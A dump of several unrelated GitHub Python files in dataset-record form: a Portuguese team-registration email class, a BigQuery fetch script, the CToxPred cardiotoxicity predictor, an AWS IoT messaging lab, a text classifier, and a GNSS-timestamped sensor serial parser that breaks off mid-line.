mensagem[\"From\"] = email_remetente\n mensagem[\"To\"] = email_destinatario\n mensagem[\"Subject\"] = \"Confirmação de Cadastro\"\n texto_email = f\"\"\"\n Olá, eu sou {nome_capitao}, \n E estou finalizando o meu cadastro como capitão da minha equipe, na modalidade vôlei de areia! \n Segue abaixo a lista de membros inscritos na equipe:\n {lista_membros_str}\n E meu e-mail para caso algo não esteja de acordo: \n {email_capitao}\n Obrigado!\n Atenciosamente, \n {nome_capitao}\n \"\"\"\n parte_texto = MIMEText(texto_email, \"plain\")\n mensagem.attach(parte_texto)\n try:\n servidor_smtp = smtplib.SMTP(\"smtp.gmail.com\", 587)\n servidor_smtp.starttls()\n servidor_smtp.login(email_destinatario, senha_destinatario)\n servidor_smtp.sendmail(email_remetente,email_destinatario,mensagem.as_string())\n servidor_smtp.quit()\n print(\"Email de confirmação enviado com sucesso!\")\n except smtplib.SMTPException as e:\n print(\"Ocorreu um erro ao enviar o email de confirmação:\", str(e))\n @staticmethod\n def _verificar_email(email):\n \"\"\"Verifica se o e-mail é do Gmail.\"\"\"\n pattern = r\"[^@]+@gmail\\.com\"\n return bool(re.match(pattern, email))\nclass SistemaDeCadastro:\n @classmethod\n def autenticar(cls, senha, senha_armazenada):\n return senha == senha_armazenada\n #O método autenticar é usado para comparar a senha fornecida com a senha armazenada\n #Se as senhas coincidirem, o método retorna True, senão, retorna False.\n @classmethod\n def cadastrar_professor(cls, professor):\n with open(\"professores.txt\", \"a\", encoding=\"utf-8\") as arquivo:\n arquivo.write(f\"{professor.nome},{professor.email},{professor.num_matricula},{professor.senha}\\n\")\n #Este método é usado para adicionar informações de um novo professor ao arquivo \"professores.txt\".\n #Ele formata os dados do professor e escreve no arquivo,\n #garantindo que cada registro do professor seja separado por uma quebra de linha.\n @staticmethod\n def obter_lista_membros():\n try:\n with open(\"alunos_cadastrados.txt\", \"r\") as arquivo:\n linhas = arquivo.readlines()\n membros = []\n for linha in linhas:\n campos = linha.strip().split(\",\")\n nome_completo = campos[0].split(\":\")[1].strip()\n curso = campos[1].split(\":\")[1].strip()\n email = campos[2].split(\":\")[1].strip()\n num_matricula = campos[3].split(\":\")[1].strip()\n data_nascimento = campos[4].split(\":\")[1].strip()\n num_camisa = campos[5].split(\":\")[1].strip()\n membro = {\n \"Nome Completo\": nome_completo,\n \"Curso\": curso,\n \"E-mail\": email,\n \"Número de Matrícula\": num_matricula,\n \"Data de Nascimento\": data_nascimento,\n \"Número da Camisa\": num_camisa\n }\n membros.append(membro)\n return membros\n except FileNotFoundError:\n return []","repo_name":"MARIA-LUIZ4/Programa-o_Orientada_A_Objetos_4bimestre","sub_path":"classe.py","file_name":"classe.py","file_ext":"py","file_size_in_byte":8544,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24672435886","text":"import numpy\nimport pandas\nfrom google.cloud import bigquery\n\nclient = bigquery.Client()\n\ndef getData():\n query = client.run_sync_query(\"\"\"\n SELECT\n a_user_key,\n a_acpid,\n a_title,\n url\n FROM\n traffic.events\n WHERE\n _PARTITIONTIME=TIMESTAMP('2017-02-17')\n AND a_acpid IS NOT NULL\n AND a_title IS NOT NULL\n AND a_hidden=FALSE\n AND a_user_key IS NOT NULL\n ;\"\"\")\n\n query.use_legacy_sql = False\n print(\"Running query\")\n query.run()\n\n data = []\n pageToken = None\n\n while True:\n print(\"Fetching page\")\n rows, totalRows, pageToken = query.fetch_data(page_token=pageToken)\n for row in rows:\n data.append(list(row))\n if not pageToken:\n break\n data = numpy.array(rows)\n df = pandas.DataFrame(data=data, columns=[\"userId\", \"articleId\", \"articleTitle\", \"url\"])\n return df\n\ndef test():\n a = (\"2017-02-17 00:29:34\", \"a43b1769-a341-46ec-b1aa-c330c429bcb7\", \"5-35-386704\", \"– Hjertet mitt slo ikke på 20 minutter\", \"http://mobil.oa.no/nyheter/harestua/hadeland/hjertet-mitt-slo-ikke-pa-20-minutter/s/5-35-386704\")\n row = []\n row.append(list(a))\n row.append(list(a))\n data = numpy.array(row)\n df = pandas.DataFrame(index=data[:, 0], data=data[:, 1:], columns=[\"userId\", \"articleId\", \"articleTitle\", \"url\"])\n print(df)\n\nif __name__ == \"__main__\":\n df = getData()\n print(\"printing to hdf5\")\n df.to_hdf(\"read_20170217.h5\", key=\"read\")\n print(\"Complete!\")\n # test()\n","repo_name":"rugern/zion","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9565285592","text":"import os\r\nimport joblib\r\nimport sys\r\nfrom typing import List\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport torch\r\n\r\nfrom CToxPred.pairwise_correlation import CorrelationThreshold\r\nfrom CToxPred.utils import compute_fingerprint_features, \\\r\n compute_descriptor_features, compute_metrics\r\nfrom CToxPred.hERG_model import hERGClassifier\r\nfrom CToxPred.nav15_model import Nav15Classifier\r\nfrom CToxPred.cav12_model import Cav12Classifier\r\n\r\n\r\n\r\ndef _generate_predictions(smiles_list: List[str]) -> None:\r\n \"\"\"\r\n Generates predictions for hERG, Nav1.5, and Cav1.2 targets based on the provided list of SMILES.\r\n\r\n This function processes the input SMILES list and computes fingerprint and descriptor features for each compound.\r\n Then, it loads pre-trained models for hERG, Nav1.5, and Cav1.2 targets, and predicts the activity of each compound\r\n for these targets using the respective models. The predictions are saved to a CSV file named 'predictions.csv'\r\n with columns: 'SMILES', 'hERG', 'Nav1.5', and 'Cav1.2'. The 'hERG', 'Nav1.5', and 'Cav1.2' columns contain the\r\n binary predictions (0 or 1) for each target, representing non-toxic (negative class) or toxic (positive class)\r\n compounds, respectively.\r\n\r\n Parameters:\r\n smiles_list: List[str] \r\n A list containing SMILES strings of chemical compounds.\r\n\r\n Returns:\r\n None: \r\n The function saves the predictions to a CSV file named 'predictions.csv'.\r\n \"\"\"\r\n # Compute features\r\n print('>>>>>>> Calculate Features <<<<<<<')\r\n fingerprints = compute_fingerprint_features(smiles_list)\r\n descriptors = compute_descriptor_features(smiles_list)\r\n # Process hERG\r\n print('>>>>>>> Predict hERG <<<<<<<')\r\n hERG_fingerprints = fingerprints\r\n ## Load model\r\n hERG_predictor = hERGClassifier(1905, 2)\r\n path = ['CToxPred', 'models', 'model_weights', 'hERG',\r\n '_herg_checkpoint.model']\r\n hERG_predictor.load(os.path.join(*path))\r\n device = torch.device('cpu')\r\n hERG_predictions = hERG_predictor(\r\n torch.from_numpy(hERG_fingerprints).float().to(device)).argmax(1).cpu()\r\n\r\n # Process Nav1.5\r\n print('>>>>>>> Predict Nav1.5 <<<<<<<')\r\n nav15_fingerprints = fingerprints\r\n nav15_descriptors = descriptors\r\n ## Load preprocessing pipeline\r\n path = ['CToxPred', 'models', 'decriptors_preprocessing', 'Nav1.5',\r\n 'nav_descriptors_preprocessing_pipeline.sav']\r\n descriptors_transformation_pipeline = joblib.load(os.path.join(*path))\r\n nav15_descriptors = descriptors_transformation_pipeline.transform(\r\n nav15_descriptors)\r\n nav15_features = np.concatenate((nav15_fingerprints, nav15_descriptors),\r\n axis=1)\r\n ## Load model\r\n nav15_predictor = Nav15Classifier(2454, 2)\r\n path = ['CToxPred', 'models', 'model_weights', 'Nav1.5',\r\n '_nav15_checkpoint.model']\r\n nav15_predictor.load(os.path.join(*path))\r\n nav15_predictions = nav15_predictor(\r\n torch.from_numpy(nav15_features).float().to(device)).argmax(1).cpu()\r\n\r\n # Process Cav1.2\r\n print('>>>>>>> Predict Cav1.2 <<<<<<<')\r\n cav12_fingerprints = fingerprints\r\n cav12_descriptors = descriptors\r\n ## Load preprocessing pipeline\r\n path = ['CToxPred', 'models', 'decriptors_preprocessing', 'Cav1.2',\r\n 'cav_descriptors_preprocessing_pipeline.sav']\r\n descriptors_transformation_pipeline = joblib.load(os.path.join(*path))\r\n cav12_descriptors = descriptors_transformation_pipeline.transform(\r\n cav12_descriptors)\r\n cav12_features = np.concatenate((cav12_fingerprints, cav12_descriptors),\r\n axis=1)\r\n ## Load model\r\n cav12_predictor = Cav12Classifier(2586, 2)\r\n path = ['CToxPred', 'models', 'model_weights', 'Cav1.2',\r\n '_cav12_checkpoint.model']\r\n cav12_predictor.load(os.path.join(*path))\r\n cav12_predictions = cav12_predictor(\r\n torch.from_numpy(cav12_features).float().to(device)).argmax(1).cpu()\r\n\r\n # Generate output\r\n results = pd.DataFrame({'SMILES': smiles_list, 'hERG': hERG_predictions,\r\n 'Nav1.5': nav15_predictions,\r\n 'Cav1.2': cav12_predictions})\r\n\r\n results.to_csv('predictions.csv', index=False)\r\n\r\ndef _help():\r\n \"\"\"\r\n Display the usage instructions for the ctoxpred.py script.\r\n\r\n Usage:\r\n python ctoxpred.py \r\n\r\n Note:\r\n This function prints the command format required to run the ctoxpred.py \r\n script and provides information about the expected input file \r\n format. Ensure to replace '' with the actual path\r\n to your SMILES input file.\r\n \"\"\"\r\n\r\n print(\"\\n CToxPred: A comprehensive cardiotoxicity prediction tool of small molecules \\\r\n \\n\\t on three targets: hERG, Nav1.5, Cav1.2 \\n \\\r\n \\n\\tTo get predictions, run the command as follows:\\n\\t $ python ctoxpred.py .smi \\\r\n \\n\\nWhere is the SMILES input file to the software, and has the extension .smi \\n\")\r\n\r\nif __name__ == \"__main__\":\r\n if len(sys.argv) == 2 and (sys.argv[1] == '--help' or sys.argv[1] == '-h'):\r\n _help()\r\n elif len(sys.argv) > 2:\r\n _help()\r\n else:\r\n if not sys.argv[1].endswith('.smi'):\r\n print('File extension wrong.')\r\n else:\r\n with open(sys.argv[1], 'r') as file:\r\n smiles_list = []\r\n for smiles in file:\r\n smiles_list.append(smiles.strip())\r\n _generate_predictions(smiles_list)\r\n\r\n\r\n","repo_name":"issararab/CToxPred","sub_path":"CToxPred.py","file_name":"CToxPred.py","file_ext":"py","file_size_in_byte":5668,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"33619445912","text":"from AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient\r\n\r\n\r\nimport json\r\n\r\n\r\nimport os\r\n\r\n# Load the endpoint from file\r\nwith open('/home/ec2-user/environment/endpoint.json') as json_file: \r\n data = json.load(json_file)\r\n\r\n\r\ndeviceName = os.path.split(os.getcwd())[1]\r\n\r\n# Set the destinationDeviceName depending on this deviceName\r\nif deviceName == 'car1':\r\n destinationDeviceName = 'car2'\r\nelse:\r\n destinationDeviceName = 'car1'\r\n\r\n\r\nsubTopic = 'lab/messaging/' + deviceName\r\npubTopic = 'lab/messaging/' + destinationDeviceName\r\nkeyPath = 'private.pem.key'\r\ncertPath = 'certificate.pem.crt'\r\ncaPath = '/home/ec2-user/environment/root-CA.crt'\r\nclientId = deviceName\r\nhost = data['endpointAddress']\r\nport = 8883\r\n\r\n\r\n\r\nmyAWSIoTMQTTClient = AWSIoTMQTTClient(clientId)\r\nmyAWSIoTMQTTClient.configureEndpoint(host, port)\r\nmyAWSIoTMQTTClient.configureCredentials(caPath, keyPath, certPath)\r\nmyAWSIoTMQTTClient.connect()\r\n\r\n\r\n\r\n\r\n\r\ndef customCallback (client, userdata, message):\r\n print(\"Received messsage : \" + message.payload.decode() + \" from topic \" + message.topic) \r\n\r\n\r\n\r\n\r\n\r\n\r\nmyAWSIoTMQTTClient.subscribe(subTopic, 1, customCallback)\r\n\r\n\r\n\r\ndef publishToIoTTopic(topic, payload):\r\n myAWSIoTMQTTClient.publish(topic, payload, 1)\r\n \r\n \r\n \r\n\r\n\r\n# Infinite loop reading console input and publishing what it finds\r\nwhile True:\r\n message = input('Enter a message on the next line to send to ' + pubTopic + ':\\r\\n')\r\n \r\n # Calling function to publish to IoT Topic\r\n publishToIoTTopic(pubTopic, message)\r\n","repo_name":"Manith-2001/Projects","sub_path":"messaging.py","file_name":"messaging.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"89717638","text":"from sklearn.feature_extraction.text import CountVectorizer\n# from sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics import f1_score, classification_report\n# from sklearn.linear_model import SGDClassifier\nfrom sklearn.linear_model import LogisticRegression\nimport numpy as np\nimport os\nimport pickle\n\n\ndef run_lr_3gram(data_name, train_path, test_path):\n \"\"\"\n\n :param data_name:\n :type data_name: str\n :param train_path: training path\n :type train_path: str\n :param test_path: testing file path\n :type test_path: str\n :return:\n \"\"\"\n print('Working on: '+data_name)\n # check if the vectorizer and exists\n # build the vectorizer\n if not (os.path.exists('./vects/lr_' + data_name + '.pkl') and\n os.path.exists('./clfs/lr_' + data_name + '.pkl')):\n\n print('Loading Training data........')\n # load the training data\n train_docs = []\n train_labels = []\n with open(train_path) as train_file:\n cols = train_file.readline() # skip the 1st column names\n cols = cols.strip().split('\\t')\n doc_idx = cols.index('text') # document index\n label_idx = cols.index('label') # label index\n\n for line in train_file:\n if len(line.strip()) < 5:\n continue\n \n infos = line.strip().split('\\t')\n train_labels.append(int(infos[label_idx]))\n train_docs.append(infos[doc_idx].strip())\n print(np.unique(train_labels))\n \n print('Fitting Vectorizer.......')\n vect = CountVectorizer(ngram_range=(1, 3), max_features=15000, min_df=2)\n vect.fit(train_docs)\n pickle.dump(vect, open('./vects/lr_'+data_name+'.pkl', 'wb')) # save the vectorizer\n\n print('Transforming Training data........')\n train_docs = vect.transform(train_docs)\n\n # fit the model\n print('Building model............')\n if len(np.unique(train_labels)) > 2:\n # clf = SGDClassifier(loss='log', class_weight='balanced')\n clf = LogisticRegression(class_weight='balanced', multi_class='auto')\n else:\n # clf = SGDClassifier(loss='log', class_weight='balanced')\n clf = LogisticRegression(class_weight='balanced')\n clf.fit(train_docs, train_labels)\n pickle.dump(clf, open('./clfs/lr_' + data_name + '.pkl', 'wb')) # save the classifier\n else:\n vect = pickle.load(open('./vects/lr_'+data_name+'.pkl', 'rb'))\n clf = pickle.load(open('./clfs/lr_'+data_name+'.pkl', 'rb'))\n\n # load the test data\n test_docs = []\n test_labels = []\n with open(test_path) as test_file:\n cols = test_file.readline() # skip the 1st column names\n cols = cols.strip().split('\\t')\n doc_idx = cols.index('text') # document index\n label_idx = cols.index('label') # label index\n for line in test_file:\n if len(line.strip()) < 5:\n continue\n infos = line.strip().split('\\t')\n test_labels.append(int(infos[label_idx]))\n test_docs.append(infos[doc_idx].strip())\n\n # transform the test data\n print('Testing.........')\n test_docs = vect.transform(test_docs)\n y_preds = clf.predict(test_docs)\n\n with open('./results/lr_results.txt', 'a') as writefile:\n writefile.write(data_name + '_________________\\n')\n writefile.write(str(f1_score(y_pred=y_preds, y_true=test_labels, average='weighted'))+'\\n')\n report = classification_report(y_pred=y_preds, y_true=test_labels, digits=3)\n print(report)\n writefile.write(report + '\\n')\n writefile.write('.........................\\n')\n\n\nif __name__ == '__main__':\n # create directories for saving models and tokenizers\n if not os.path.exists('./vects/'):\n os.mkdir('./vects/')\n if not os.path.exists('./clfs/'):\n os.mkdir('./clfs/')\n if not os.path.exists('./results/'):\n os.mkdir('./results/')\n\n data_list = [\n 'imdb',\n 'yelp',\n 'amazon_health',\n ]\n\n for dname in data_list:\n train_raw_path = '../data/raw/'+dname+'/train.tsv'\n test_raw_path = '../data/raw/'+dname+'/test.tsv'\n run_lr_3gram(dname, train_raw_path, test_raw_path)\n","repo_name":"xiaoleihuang/UserEmbedding","sub_path":"personalize/lr.py","file_name":"lr.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"26029524826","text":"# Original code by Mehmet Ozturk \n# Modified by Sebastiaan van Essen 07/2016\n# This code combines the time precision of the GNSS network and data from ALM sensors\n# and sends the data via Ethernet to a computer as a stand alone module.\n#\n\n#from _overlapped import NULL\n#from test.support import temp_cwd\n\n\n#///////////////////////////////// Importing modules for functions later used ///////////////////////\n\nimport os # importing the possibility to operate system commands\nimport sys # Importing the possibility to use some system variables\nimport serial # Importing the possibility to use serial communication\nimport threading # Importing the possibility to run multiple operations at the same time\nimport datetime # Importing some (system) clock operations\nimport time # Importing some (system) clock operations\nimport logging # importing the possibility to track events and log them\nimport socket # Importing Networking interface\nfrom macpath import join\nsys.path.append(r'/home/pi/pysrc')\nimport Adafruit_BBIO.GPIO as GPIO # readying the code for GPIO usage\n#import pydevd # Import remote debugger\nimport string\n\n\n\n#///////////////////////////////// Defining variables used for the data splitting ///////////////////\n\n\n# These variables are for the parsing of the ZDA data\nsDag = ''\nsMaand = ''\nsJaar = ''\nsUur = ''\nsMinuut = ''\nsSecond = ''\nsMSecond = ''\ndatum = ''\ntijd = ''\n\n# These variables are for the parsing of the AML data\n\nstatus = 'st'\ndataToSend = '$SBDAML,,,,,,,,ST' + '\\r\\n'\n\n# These variables are used to pull the time from the systemclock and use them for tagging\nsDagNu = ''\nsMaandNu = ''\nsJaarNu = ''\nsUurNu = ''\nsMinuutNu = ''\nsSecondNu = ''\nsMSecondNu = ''\ndatumNu = ''\ntijdNu = ''\nsetTime = ''\ndatumTijd = ''\n#freshTime = 0\n\n#///////////////////////////////// Defining triggers for functions /////////////////////////////////\n\nbTrigger = False # This trigger is used for the PPS input\nbZdaOntvangen = False # This trigger is to keep track of the \"freshness\" of the ZDA time info\nbAmlOntvangen = False # This trigger is to see if there is unsent AML info.\n\n\n#///////////////////////////////// Error/debug logging functionality ///////////////////////////////\n\nlogging.basicConfig(level=logging.DEBUG,\n format='[%(levelname)s] (%(threadName)-10s) %(message)s',\n )\n\n\n#///////////////////////////////// GPIO configuration ////////////////////////////////////////////////\n\n#Configuring the general pins for input/output (GPIO\n#GPIO.setmode(GPIO.BCM) # setup GPIO using Board numbering\nGPIO.setup(\"P9_42\", GPIO.IN, pull_up_down=GPIO.PUD_DOWN) # setting Pin 7 as input, also a pull-down resistor is turned on internally\n\n\n#/////////////////// Serial communication configurations ///////////////////////////////////////////\n\n#Open Com port of GPZDA (connected via pin 8 and 10 of GPIO)\nserZda = serial.Serial('/dev/ttyO1') # Linking serZDA to the correct Com port\nserZda.baudrate = 9600 # Setting the communication speed of the serial port\nserZda.isOpen() # Open serial port\n\n\n#Open Com port of AML (connected via USB)\nserAml = serial.Serial('/dev/ttyO2') # Linking serAml to the correct Com port\nserAml.baudrate = 38400 # Setting the communication speed of the serial port\nserAml.isOpen() # Open serial port\n\n\n\n\n#///////////////////////////////// Processing the incoming data by splitting it and putting it in usable variables //////////\n\n\n\n #Clearing data from AML\n\ndef clearAml():\n global status\n global datumNu; datumNu = ''\n global dataToSend; dataToSend = '$SBDAML,,,,,,,,' + status + '\\r\\n'\n print ('AML cleared\\r\\n')\n# writeCom2('AML cleared\\r\\n')\n\n #Pulling the time from the system and write it into a usable variable\n\ndef getTime():\n\n currentDateTimeRaw = datetime.datetime.now() + datetime.timedelta(seconds =1)\n currentDateTime = currentDateTimeRaw.strftime('%H:%M:%S.%f,%d,%m,%Y')\n currentTime = currentDateTime.split(',') # with split() each comma seperated piece of currentDateTime is written in array currentTime. \n \n global tijdNu; tijdNu = currentTime[0] # Splitting the array into time \n global sDagNu; sDagNu = currentTime[1] # Day\n global sMaandNu; sMaandNu = currentTime[2] # Month \n global sJaarNu; sJaarNu = currentTime[3] # And year \n global datumNu; datumNu = sDagNu + '-' + sMaandNu + '-' + sJaarNu + ',' + tijdNu # The combined data of day+month+year makes the variable datumNu (date) \n\n\n\n\n #Splitting the ZDA data into 8 variables, then process it to time and date\n\ndef parseZda(raw_message):\n global bZdaOntvangen\n global status\n \n if raw_message is None: # if no data is sent stop the madness\n return None\n bZdaOntvangen = False\n status = \"IZ\"\n \n try:\n sLines = raw_message.split(',') # with split() each comma seperated piece of raw_message is written in array sLines. \n if len(sLines) < 7: # if the data contains less then 7 blocks\n return None\n if len(sLines[1]) < 9: # or more then 9\n return None # do nothing\n \n tempTijd = sLines[1] # tempTijd is the 2nd string of data from array sLines \n global sUur; sUur = tempTijd[:2] # the first two digits are the hours\n global sMinuut; sMinuut = tempTijd[2:4] # digits 3 and 4 are minutes \n global sSecond; sSecond = tempTijd[4:6] # digits 5 and 6 are seconds \n global sMSecond; sMSecond = tempTijd[7:] # all digits from 7 and up are milliseconds \n global tijd; tijd = sUur + ':' + sMinuut + ':' + sSecond + '.' + sMSecond #Time in format HH:MM:SS \n \n if len(sLines[2]) < 2 or len(sLines[3]) < 2 or len(sLines[4]) < 2: # if string 2, 3 or 4 is longer then 2 digits stop the data\n return None\n global sDag; sDag = sLines[2] # the 3th string of sLines is the day\n global sMaand; sMaand = sLines[3] # the 4th string of sLines is the month \n global sJaar; sJaar = sLines[4] # the 3th string of sLines is the year \n global datum; datum = sJaar + '-' + sMaand + '-' + sDag # The combined data of day+month+year makes the variable datum (date) \n# return ' ZDA OK' + ' >> ' +datum + ' ' + tijd # Send confirmation + data (ZDA OK >> parsed data ) to console and Com1\n global datumTijd; datumTijd = \"'\" + datum + ' ' + tijd +\"'\" # The combined data of day+month+year makes the variable datumNu (date)\n# print (datumTijd)\n# status = \"00\"\n return ' ZDA OK' + ' >> ' + datumTijd # Send confirmation + data (ZDA OK >> parsed data ) to console and Com1\n\n except Exception as e: # if something goes wrong print the error to console\n# bZdaOntvangen = False\n# status = \"IZ\" \n print ('Exception: ' + e)\n\n\n #Splitting the AML Data into variables and combining with time\n\ndef parseAml (raw_mess):\n global sLineAml; sLineAml = raw_mess.split(' ') # with split() each space seperated piece of raw_mess is written in array sLinesAml. \n if len(sLineAml) < 4: # if the data is shorter then 5 blocks of data run next line\n return None # return stops the function if the \"if statement\" is met (see above)\n getTime() # Get the current system time and put it in datumNu\n global dataToSend # make dataToSend (variable) usable in this function\n global status # Do the same as above, but for status\n\n if len(sLineAml) == 4: # if the data is longer then 3 blocks of data run next line \n dataToSend = '$SBDAML' + ',' + datumNu + ',' + sLineAml[1] + ',' + sLineAml[2] + ',' + sLineAml[3] + ',' + status + '\\r\\n' # Create a string of data \n\n elif len(sLineAml) == 5: # if the data is longer then 3 blocks of data run next line \n dataToSend = '$SBDAML' + ',' + datumNu + ',' + sLineAml[1] + ',' + sLineAml[2] + ',' + sLineAml[3] + ',' + sLineAml[4] + ',' + status + '\\r\\n' \n\n elif len(sLineAml) == 6: # if the data is longer then 4 blocks of data run next line\n dataToSend = '$SBDAML' + ',' + datumNu + ',' + sLineAml[1] + ',' + sLineAml[2] + ',' + sLineAml[3] + ',' + sLineAml[4] + ',' + sLineAml[5] + ',' + status + '\\r\\n' \n\n elif len(sLineAml) == 7: # if the data is longer then 5 blocks of data run next line\n dataToSend = '$SBDAML' + ',' + datumNu + ',' + sLineAml[1] + ',' + sLineAml[2] + ',' + sLineAml[3] + ',' + sLineAml[4] + ',' + sLineAml[5] + ',' + sLineAml[6] + ',' + status + '\\r\\n' \n\n elif len(sLineAml) == 8: # if the data is longer then 6 blocks of data run next line\n dataToSend = '$SBDAML' + ',' + datumNu + ',' + sLineAml[1] + ',' + sLineAml[2] + ',' + sLineAml[3] + ',' + sLineAml[4] + ',' + sLineAml[5] + ',' + sLineAml[6] + ',' + sLineAml[7] + ',' + status + '\\r\\n'\n\n elif len(sLineAml) == 9: # if the data is longer then 8 blocks of data run next line \n dataToSend = '$SBDAML' + ',' + datumNu + ',' + sLineAml[1] + ',' + sLineAml[2] + ',' + sLineAml[3] + ',' + sLineAml[4] + ',' + sLineAml[5] + ',' + sLineAml[6] + ',' + sLineAml[7] + ',' + sLineAml[8] + ',' + status + '\\r\\n' \n\n elif len(sLineAml) == 10: # if the data is longer then 9 blocks of data run next line \n dataToSend = '$SBDAML' + ',' + datumNu + ',' + sLineAml[1] + ',' + sLineAml[2] + ',' + sLineAml[3] + ',' + sLineAml[4] + ',' + sLineAml[5] + ',' + sLineAml[6] + ',' + sLineAml[7] + ',' + sLineAml[8] + ',' + sLineAml[9] + ',' + status+ '\\r\\n' \n\n elif len(sLineAml) == 11: # if the data is longer then 9 blocks of data run next line \n dataToSend = '$SBDAML' + ',' + datumNu + ',' + sLineAml[1] + ',' + sLineAml[2] + ',' + sLineAml[3] + ',' + sLineAml[4] + ',' + sLineAml[5] + ',' + sLineAml[6] + ',' + sLineAml[7] + ',' + sLineAml[8] + ',' + sLineAml[9] + ',' + sLineAml[10] + ',' + status + '\\r\\n' \n\n elif len(sLineAml) == 12: # if the data is longer then 9 blocks of data run next line \n dataToSend = '$SBDAML' + ',' + datumNu + ',' + sLineAml[1] + ',' + sLineAml[2] + ',' + sLineAml[3] + ',' + sLineAml[4] + ',' + sLineAml[5] + ',' + sLineAml[6] + ',' + sLineAml[7] + ',' + sLineAml[8] + ',' + sLineAml[9] + ',' + sLineAml[10] + ',' + sLineAml[11] + ',' + status + '\\r\\n' \n\n elif len(sLineAml) == 13: # if the data is longer then 9 blocks of data run next line \n dataToSend = '$SBDAML' + ',' + datumNu + ',' + sLineAml[1] + ',' + sLineAml[2] + ',' + sLineAml[3] + ',' + sLineAml[4] + ',' + sLineAml[5] + ',' + sLineAml[6] + ',' + sLineAml[7] + ',' + sLineAml[8] + ',' + sLineAml[9] + ',' + sLineAml[10] + ',' + sLineAml[11] + ',' + sLineAml[12]+ ',' + status + '\\r\\n' \n\n elif len(sLineAml) == 14: # if the data is longer then 9 blocks of data run next line \n dataToSend = '$SBDAML' + ',' + datumNu + ',' + sLineAml[1] + ',' + sLineAml[2] + ',' + sLineAml[3] + ',' + sLineAml[4] + ',' + sLineAml[5] + ',' + sLineAml[6] + ',' + sLineAml[7] + ',' + sLineAml[8] + ',' + sLineAml[9] + ',' + sLineAml[10] + ',' + sLineAml[11] + ',' + sLineAml[12]+ ',' + sLineAml[13] + ',' + status + '\\r\\n' \n\n elif len(sLineAml) == 15: # if the data is longer then 9 blocks of data run next line \n dataToSend = '$SBDAML' + ',' + datumNu + ',' + sLineAml[1] + ',' + sLineAml[2] + ',' + sLineAml[3] + ',' + sLineAml[4] + ',' + sLineAml[5] + ',' + sLineAml[6] + ',' + sLineAml[7] + ',' + sLineAml[8] + ',' + sLineAml[9] + ',' + sLineAml[10] + ',' + sLineAml[11] + ',' + sLineAml[12]+ ',' + sLineAml[13] + ',' + sLineAml[14]+ ',' + status + '\\r\\n' \n\n elif len(sLineAml) == 16: # if the data is longer then 9 blocks of data run next line \n dataToSend = '$SBDAML' + ',' + datumNu + ',' + sLineAml[1] + ',' + sLineAml[2] + ',' + sLineAml[3] + ',' + sLineAml[4] + ',' + sLineAml[5] + ',' + sLineAml[6] + ',' + sLineAml[7] + ',' + sLineAml[8] + ',' + sLineAml[9] + ',' + sLineAml[10] + ',' + sLineAml[11] + ',' + sLineAml[12]+ ',' + sLineAml[13] + ',' + sLineAml[14]+ ',' + sLineAml[15]+ ',' + status + '\\r\\n' \n\n elif len(sLineAml) == 17: # if the data is longer then 9 blocks of data run next line \n dataToSend = '$SBDAML' + ',' + datumNu + ',' + sLineAml[1] + ',' + sLineAml[2] + ',' + sLineAml[3] + ',' + sLineAml[4] + ',' + sLineAml[5] + ',' + sLineAml[6] + ',' + sLineAml[7] + ',' + sLineAml[8] + ',' + sLineAml[9] + ',' + sLineAml[10] + ',' + sLineAml[11] + ',' + sLineAml[12]+ ',' + sLineAml[13] + ',' + sLineAml[14]+ ',' + sLineAml[15]+ ',' + sLineAml[16]+ ',' + status + '\\r\\n' \n\n elif len(sLineAml) == 18: # if the data is longer then 9 blocks of data run next line \n dataToSend = '$SBDAML' + ',' + datumNu + ',' + sLineAml[1] + ',' + sLineAml[2] + ',' + sLineAml[3] + ',' + sLineAml[4] + ',' + sLineAml[5] + ',' + sLineAml[6] + ',' + sLineAml[7] + ',' + sLineAml[8] + ',' + sLineAml[9] + ',' + sLineAml[10] + ',' + sLineAml[11] + ',' + sLineAml[12]+ ',' + sLineAml[13] + ',' + sLineAml[14]+ ',' + sLineAml[15]+ ',' + sLineAml[16]+ ',' + sLineAml[17]+ ',' + status + '\\r\\n' \n\n status = \"NC\"\n del sLineAml # Clearing out the data from sLineAml so no old data is processed the next time\n return ' ALM OK'+' >> '+ dataToSend # Send confirmation + data (AML OK >> parsed data ) to console\n\n\n#///////////////////////////////// Serial receive loops /////////////////////////////////////////////\n\n\n #Serial ZDA (Com1)\n \ndef serZdaReader():\n \n while True: # Run forever\n bLine = serZda.readline() # Read the incoming data from serial ZDA and put it in bLine\n try:\n sLine = bLine.decode(encoding='utf_8') # decode it into usable data \n\n except:\n pass\n\n pass\n global bZdaOntvangen\n global status\n print (' COM1 ZDA: ' +sLine) # Write the raw data to terminal\n datumtijd = parseZda(sLine) # parse the raw data string into usable variables\n if datumtijd == None: # if there is no usable data print \"datumtijd is none\"\n print('Datumtijd is none:')\n bZdaOntvangen = False\n status = \"IZ\"\n \n else: # If the data is usable \n\n# if status == \"NZ\":\n# status = \"FC\"\n# datumtijd = False\n# else:\n bZdaOntvangen = True # The trigger that the data is fresh is put to true\n print ('ZDA out' + ' ' + datumtijd + '\\r\\n'+ '\\r\\n') # Print the usable date and time to terminal\n# status = \"OK\"\n \n\n #Serial AML (Com2)\ndef serAmlReader():\n \n while True: # loop forever\n b1Line = serAml.readline() # read the line from serial ALM and write it to blLine\n s1Line = b1Line.decode(encoding='utf_8') # Decode the data from serial ALM to usable data\n s1Line = s1Line.rstrip(' ' +'\\r\\n')\n\n pass\n print (' COM2 AML: '+s1Line) # Print the raw data to console \n print ( datetime.datetime.now()) # Print to console AML was received\n isAmlValid = parseAml(s1Line) # turn the raw data into usable data blocks\n global bZdaOntvangen\n if isAmlValid == None: # if the data is garbage print \"AML not valid\" to console\n print('AML not valid')\n \n else:\n# bAlmOntvangen = True # If the data is not garbage do the following\n print 